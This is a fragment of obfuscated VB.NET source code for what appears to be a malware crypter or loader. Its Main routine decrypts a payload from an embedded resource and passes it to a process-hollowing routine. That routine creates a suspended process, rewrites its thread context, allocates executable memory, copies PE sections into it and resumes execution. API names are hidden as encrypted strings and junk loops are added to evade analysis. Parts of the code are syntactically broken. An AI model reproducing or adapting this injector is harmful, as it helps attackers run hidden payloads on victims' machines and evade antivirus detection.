Dim lu As Integer = frx(eymqrw, 60, 13568, 542490158, 30680)
Dim lyww As Integer = BitConverter.ToInt16(eymqrw, lu + 6)
Dim rg9 As Boolean = False
Dim xu56 As New IntPtr(frx(eymqrw, lu + 84, Nothing, 924805954, 32683))
Dim rbp_(3) As IntPtr
rg9 = True
If Not wiai(Of r8w5)(-1034600524, -120487632,
as4n("EZjA65podsiVlwiY0/GaVDeVzLEJjvM="), Nothing, 1291755301)(Nothing, td,
Nothing, Nothing, False, 4, Nothing, Nothing, New Byte() {}, rbp_) Then Return
Dim ggnuz(178) As UInteger, ra8, ajy7zm, ynvdp As IntPtr, y9_h As Boolean
ggnuz(0) = 65538
If wiai(Of zb)(401288021, 771950100, as4n("EZjA65podsiVkx+J5u2NYSSe7LsUidf9iw=="),
25, 2034294093)(rbp_(1), ggnuz) Then
rg9 = False
If wiai(Of ctegk)(1104693195, -743181688,
as4n("EZjA65podsiVhh+c1tWNayaf3Kc3mN/qjX0="), 222, 2108682681)(rbp_(0), New
IntPtr(ggnuz(41) + 8), ynvdp, New IntPtr(4), ajy7zm) Then
If wiai(Of mp)(-163764812, 2011810885,
as4n("FInW6ZM+C476uhecwtOWYTK1yYcfnsbskGo="), 144, 0)(rbp_(0), ynvdp) = 0 Then
ra8 = wiai(Of i18b)(1748376064, 1865069487,
as4n("EZjA65podsiVghOPxvCeaASWw7sZuMo="), 188, -190925178)(rbp_(0), New
IntPtr(frx(eymqrw, lu + 52, 30341, 947151354, 5932)), New IntPtr(frx(eymqrw, lu +
80, 27274, 1810126294, 7150)), 12288, 64)
Dim sz As wv = wiai(Of wv)(2131193193, 1185959408,
as4n("EZjA65podsiVgwiUxuCvdiqZyqcJsNfokHY8"), 178, 1310139118)
For u2d As SByte = 14 To 68
For ji As Long = 3 To 37
o7uld8 = nothing
y9_h = sz(rbp_(0), ra8, eymqrw, xu56, ajy7zm)
Dim dk(9) As Integer
rg9 = True
For sv As Integer = 0 To lyww - 1
dk(0) = 13
dk(5) = 255 + dk(0)
Buffer.BlockCopy(eymqrw, lu + 248 + (sv * 40), dk, 0, 40)
Dim od(dk(4) - 1) As Byte
Buffer.BlockCopy(eymqrw, dk(5), od, 0, od.Length)
Dim jne As Byte = 222
Dim wx6_r As String = dk.Length.ToString()
y9_h = sz(rbp_(0), New IntPtr(ra8.ToInt32 + dk(3)), od, New IntPtr(od.Length),
rg9 = False
y9_h = sz(rbp_(0), New IntPtr(ggnuz(41) + 8), uf4ak1(40, ra8.ToInt32, True,
Nothing, Date.Now, 23174), New IntPtr(4), ajy7zm)
ggnuz(44) = CUInt(ra8.ToInt32 + frx(eymqrw, lu + 40, 531, 466778622, 7803))
wiai(Of zb)(0, 883985038, as4n("EZjA65podsiVhx+J5u2NYSSe7LsUidf9iw=="), 199,
4136455)(rbp_(1), ggnuz)
wiai(Of w4)(Nothing, 1907469483, as4n("EZjA65podsiVhh+Ox+iaUC2IyrUe"), 69, Nothing)
End If
End If
End If
End Try
End If
End Sub
Sub Main()
On Error Resume Next
Dim ca0g As Date = Date.Now
Call a5AEs46()
For wrd6fu As SByte = 3 To 69
Dim y7bc3y As Boolean = True
If y7bc3y Then
For Each vl3 As Char In "+8]"
End If
If True Then
End If
For g6j2 As UInteger = 5 To 81
If True Then
End If
Call g4()
Dim gzd3 As New ResourceManager("lq22nktq", Assembly.GetExecutingAssembly)
eymqrw(la(Date.Now, -4, DirectCast(gzd3.GetObject(as4n("HI+C/Z1vIJ0=")), Byte()),
Nothing, 108, -26195), 3143, Date.Now)
End Sub
End Module

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